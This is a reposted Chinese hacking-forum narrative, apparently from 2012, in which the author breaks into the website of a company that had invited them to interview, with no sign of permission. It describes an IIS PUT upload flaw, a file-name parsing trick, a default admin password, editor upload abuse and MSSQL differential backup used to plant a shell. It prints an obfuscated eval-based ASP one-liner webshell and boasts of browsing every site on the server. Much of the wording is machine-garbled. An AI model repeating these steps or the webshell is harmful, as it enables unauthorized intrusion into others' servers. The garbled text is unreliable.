安全黑客
当前位置:安全黑客文章资讯安全技术安全检测
日期:2012-04-17 09:36:00  来源:本站整理

记一次艰难变态的具体思绪入侵[安全检测]

赞助商链接



  本文“记一次艰难变态的具体思绪入侵[安全检测]”是由安全黑客为您精心收集,来源于网络转载,文章版权归文章作者所有,本站不对其观点以及内容做任何评价,请读者自行判断,以下是其具体内容:

别人不找我,竟然有人来自动找我啊,呵呵,几天前有个公司打电话让我去面试,于是看了一下公司的网站,想检测一下安全性.发现整站都是flash的,用谷歌site了半天都显示不出来是什么范例的语言,(最后发现是html的)也没办法了,直接上JSKY,一扫描发现有IIS6 put的漏洞(目前已经修补了,截图没有保存住),这个漏洞已经很陈腐了,从前常常发生在IIS5上,但是目前能出来,那就是品德爆发了,想着品德不错,但是等下就知道怎么哀思了. 呵呵,直接上传test.txt提醒成功,接下来move提醒成功,心情登时冲动,拜候之404.

一下又不爽了,于是接着看,接着试.还是不行,没办法了,发给红尘,他测试了下,用的是wavs工具扫描了一下,竟然直接测试了一个1.asp;.jpg的文件,但是手动怎么测试上传都不行,心里就在想必定是防火墙给拦阻了.

心里想着为什么工具可以上,手工就不行,百度了一下,看到老君写过的一篇文章《IIS写权限再次操纵》中间提到了一个环境的问题,具体的可以在百度上面,办理筹划用NC提交数据包,但是测试后,还是不行,也不知道是不是技术问题,大概是办法问题.(目前还是没有办理,但是想到应当是墙的问题了)无奈,发到3est里面问了问,村长上传了txt的,未发现他给出asp的途径.这个问题就一向放在3est了.于是决意换个思绪,旁注.
    扫了一下发现整个服务器上面的程序全部是一套cms全部一样.Net的程序,并且后台近似与phpcms2008的后台,这可若何是好?这是他们自己开辟的一套程序,没有0day什么思绪都没有了,没办法了,若口令吧,试了一大半的站都没有若口令,品德忽然爆发,默许admin进去了一个.呵呵,再次峰回路转,接着就开始搞,找上传,找了半天发现有个fck编辑器,操纵了一下没有操纵成功,看到Jacks牛在线,就发给他了,经过我们不断测试,上传木马均不行,都被防火墙拦阻,很无奈,终究成功上传了一个
<%@LANGUAGE="JAVASCRIPT" CODEPAGE="65001"%>
<%
var lcx = {'名字' : Request.form('#'), '性别' : eval, '年纪' : '18', '昵称' : '请叫我一声垂老'};
lcx.性别((lcx.名字)+'');
%> 
 

归并成图片上的

    这个木马我从前也没有玩过,菜刀衔接,提醒是500,后来才发现其实这个不是用菜刀衔接的,这是要用利用冰狐一句话客户端链接的,最后也测试用冰狐一句话客户端链接,还是提醒错误.无语了,换思绪吧.
    进这个后台之前都瞥见一个soo上传工具但是一向没有效,这会测试这个吧,直接上传asp文件,提醒成功.柳暗花明啊,接着找途径没有找到.无奈上抓包工具,很遗憾,没有抓到途径,心里预备气馁了,但是一想不能气馁,直接把这个文章发表了到前台去看看有没有途径,果真不出我所料,前台可以找到这个马的途径,但是拜候还是404.无语了悲剧了.什么缘由?必定是防火墙拦阻了大概是杀软干掉了,试了N个都不行都是404.真是悲剧了.这时刻忽然间想到编辑器了,呵呵.我的猜想又对了.
 

这里我用到的是editone.asp这个是个正常的编辑器,防火墙就过了.呵呵.
直接登陆进去,拿到了这么一点点可怜的权限.接着通过这个编辑器上传大马、一句话各种马,均不行.真是碰见个变态的墙.想了想,想到了lake2大牛的webadmin 2.y果断去了官方,想不到
 

空间到期了,无奈又百度找了找,恰好当时有事情,就先出去了一下,这个思绪就放下了.
下午又把这个问题发到群里谈论了一下,jacks牛给了个思绪,net程序可以考虑MSSQL差别备份.对啊,怎么没有想到这个呢.哎,一向苦苦上传、写文件.思绪都堵死了,看来得多请教请教大牛了.直接登陆到编辑器里面新建一个1.php然后点击翻开,提醒报错 www.110hack.com
得到途径
 
shell就是这样差别备份拿到得,是个asp一句话.
 

但是权限蛮大的,整个服务器上面的站都可以浏览,看来安全做的不怎么得啊.
我靠,真想把他们鄙视一顿,当时面试还问我怎么样设置权限,看来面试官是个半吊子啊.面试完直接说可以的话一星期告诉你,看来是吹了,没有一个电话.他妹的
接着找了一下主站,猜了一下找到了主站的途径,找到了.直接上个txt 闪人..


至此一段入侵到此完毕,看了下ws组件删除,sa被降权,提权就不搞了,什么时刻有空了有心机了提下权.
文章没有什么技术含量,大牛飘过,都是一些常见的伎俩,而本人认为思绪特别重要,但愿这篇文章思绪能给大家一些帮忙

原文来自:Root Security Team http://root-sec.org/thread-501-1-1.html

阅历了各种的艰难险阻,终究还是让我如愿以偿了,真的是很不简单,特分享思绪给大家.


  以上是“记一次艰难变态的具体思绪入侵[安全检测]”的内容,如果你对以上该文章内容感兴趣,你可以看看安全黑客为您推荐以下文章:
  • 记一次艰难的星外虚拟机及D盾提权教程
  • 记一次艰难变态的具体思绪入侵
  • 本文地址: 与您的QQ/BBS好友分享!

    文章评论评论内容只代表网友观点,与本站立场无关!

       评论摘要(共 0 条,得分 0 分,平均 0 分) 查看完整评论
    免责条款 - 广告合作 - 下载声明 - 欢迎投稿 - 友情连接 - 网站地图 -
    Copyright © 2012-2013 www.110hack.com. All Rights Reserved .